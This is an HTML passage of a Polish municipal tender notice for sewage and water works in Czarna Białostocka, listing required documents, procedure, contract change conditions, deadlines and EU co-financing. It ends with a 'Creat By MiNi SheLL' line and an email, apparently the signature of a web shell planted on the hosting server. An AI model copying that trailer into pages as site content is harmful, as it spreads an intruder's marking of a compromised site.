<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	formularz ofertowy - wypełniony i podpisany przez wykonawcę z wykorzystaniem załączonego wzoru;
b)	oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych z wykorzystaniem załączonego wzoru;
c)	jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, należy dołączyć pisemne zobowiązania tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
d)	kosztorys ofertowy sporządzony dla każdego zadania odrębnie w oparciu o przedmiary robót stanowiące załączniki do SIWZ;
e)	harmonogram rzeczowo-finansowy robót wynikających z kosztorysu ofertowego w rozbiciu na elementy przewidziane do wykonania w danym kwartale realizacji inwestycji z podaniem</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian w umowie w trybie art. 144 ust. 1 ustawy Pzp:
a)	w zakresie zmiany terminu realizacji przedmiotu umowy w przypadku:
wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia robót, których realizacja wiąże się z potrzebą zmiany terminu wykonania,
szczególnie niesprzyjających warunków atmosferycznych,
wystąpienia innych okoliczności niezależnych od wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,
nie przekazania wykonawcy przez zamawiającego w terminie terenu budowy lub dokumentów budowy, do których przekazania zamawiający był zobowiązany,
wstrzymania przez zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie wykonawcy (nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych przez wykonawcę),
konieczności wykonania przez zamawiającego korekty projektu dla usunięcia wad dostarczonej dokumentacji,
wystąpienia procedury odwoławczej, skutkującej niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,
przedłużającej się procedury podpisania umowy o dofinansowanie,
w przypadku zmiany terminu realizacji przedmiotu umowy, z wyżej wymienionych przyczyn, termin ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych okoliczności;
b)	w zakresie skrócenia terminu realizacji zamówienia w przypadku stwierdzenia przez wykonawcę możliwości wcześniejszego wykonania przedmiotu umowy;
c)	zamawiający nie ma obowiązku przedłużenia terminu wykonania robót, jeżeli wykonawca w terminie 7 dni od wystąpienia okoliczności, o których mowa w ust. 2 lit. a), nie złoży zamawiającemu, na piśmie, uzasadnionego wniosku o przedłużenie terminu wykonania przedmiotu umowy i  nie uzyska  akceptacji tego wniosku;
d)	rozszerzenie odpowiedzialności z tytułu rękojmi lub przedłużenia terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.czarnabialostocka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. R. Traugutta 2, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2010 godzina 11:00, miejsce: Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. R. Traugutta 2, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Inwestycja jest współfinansowana ze środków Unii Europejskiej w ramach projektu pn. Budowa systemu kanalizacji sanitarnej i sieci wodociągowej w aglomeracji Czarna Białostocka z Regionalnego Programu Operacyjnego Województwa Podlaskiego 2007-2013: Oś priorytetowa V: Rozwój infrastruktury ochrony środowiska, Działanie V.1 Rozwój regionalny infrastruktury ochrony środowiska.
2.	Zgodnie z art. 93 ust. 1a ustawy Pzp zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki pochodzące z budżetu Unii Europejskiej, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com